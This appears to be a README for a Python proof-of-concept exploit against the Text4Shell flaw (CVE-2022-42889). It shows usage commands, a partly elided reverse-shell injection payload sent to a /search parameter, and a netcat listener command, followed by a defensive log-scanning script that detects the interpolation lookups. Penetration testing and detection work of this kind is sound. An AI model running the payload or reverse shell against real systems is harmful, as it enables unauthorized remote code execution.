A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889) — a critical Remote Code Execution (RCE) vulnerability in Apache Commons Text versions < 1.10.
This Python 3 PoC leverages the Text4Shell vulnerability to achieve RCE in Java applications that improperly interpolate user input using the StringSubstitutor class. The exploit injects ${script:...} expressions, which are evaluated and executed on the server.
This variant demonstrates exploitation via the query parameter of the /search endpoint, but the vulnerable parameter and endpoint may vary depending on the application’s implementation.
This updated version builds on the original PoC by chaudharyarjun/text4shell-exploit and introduces key enhancements for greater flexibility:
- Dynamic HTTP method selection: Specify GET or POST at runtime via command-line arguments.
- Customizable target port and vulnerable parameter: Easily modify the target port and vulnerable parameter (query by default).
- Improved error handling and usage instructions for clarity.
python3 text4shell.py <target_ip> <target_port> <callback_ip> <callback_port> <GET|POST>
python3 text4shell.py 192.168.110.150 8080 192.168.1.1 4444 GET
The script injects a reverse shell payload like:
${script:javascript:var p=java.lang.Runtime.getRuntime().exec(...)}
The payload is URL-encoded and sent to the /search endpoint via the specified HTTP method (GET or POST), targeting the vulnerable parameter query.
Set up a Netcat listener to catch the reverse shell:
nc -nlvp 4444
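For defenders, the URL-encoded ${script:...} value described above is visible in web access logs when it arrives by GET. The following is an added detection example, not part of the original PoC: the log format, sample lines and function names are constructed assumptions, and it goes beyond the page's script lookup to also flag the dns and url lookups covered by the same CVE.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Lookup prefixes reachable through default interpolation in CVE-2022-42889.
RISKY_LOOKUP = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)
# Request portion of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines: benign search, single-encoded and double-encoded input.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /search?query=shoes HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /search?query=%24%7Bscript%3Ajavascript%3A0%7D HTTP/1.1" 200 498',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /search?lang=en&q=%2524%257Bdns%253Aexample.test%257D HTTP/1.1" 200 498',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_interpolation(log_line):
    """Return [(param, lookup)] for each query parameter carrying a risky lookup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    hits = []
    # parse_qsl decodes once; fully_decode handles any further encoding layers.
    for name, value in parse_qsl(query, keep_blank_values=True):
        found = RISKY_LOOKUP.search(fully_decode(value))
        if found:
            hits.append((name, found.group(1).lower()))
    return hits

def scan(lines):
    """Map 1-based line number -> hits, for lines with at least one hit."""
    results = {}
    for number, line in enumerate(lines, 1):
        hits = find_interpolation(line)
        if hits:
            results[number] = hits
    return results

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(f"line {number}: {hits}")
```

Access logs normally omit request bodies, so POST delivery needs the same pattern applied where bodies are visible, such as a WAF or application-level request logging. Every parameter is checked rather than only query, since the vulnerable parameter varies by application.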
This exploit is provided for educational and authorized penetration testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.